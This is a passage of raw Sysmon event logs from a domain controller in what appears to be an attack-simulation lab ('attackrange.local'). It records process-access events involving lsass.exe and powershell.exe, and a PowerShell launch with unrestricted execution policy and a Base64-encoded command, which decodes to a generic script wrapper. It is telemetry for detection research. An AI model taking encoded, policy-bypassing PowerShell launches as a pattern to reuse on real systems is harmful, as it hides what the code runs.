C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.483\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.483","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.483\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.483","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.483\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.483","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.498\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.498","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.514\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001089B80600}\r\nProcessId: 3904\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_250rsj5x.z11.ps1\r\nCreationUtcTime: 2020-08-01 05:52:18.514","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.514","ProcessGuid":"{A837DB8D-0312-5F25-0000-001089B80600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_250rsj5x.z11.ps1","CreationUtcTime":"2020-08-01 05:52:18.514","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.545\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.545","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.545\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.545","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.603\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nProcessId: 4920\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-001089B80600}\r\nParentProcessId: 3904\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile 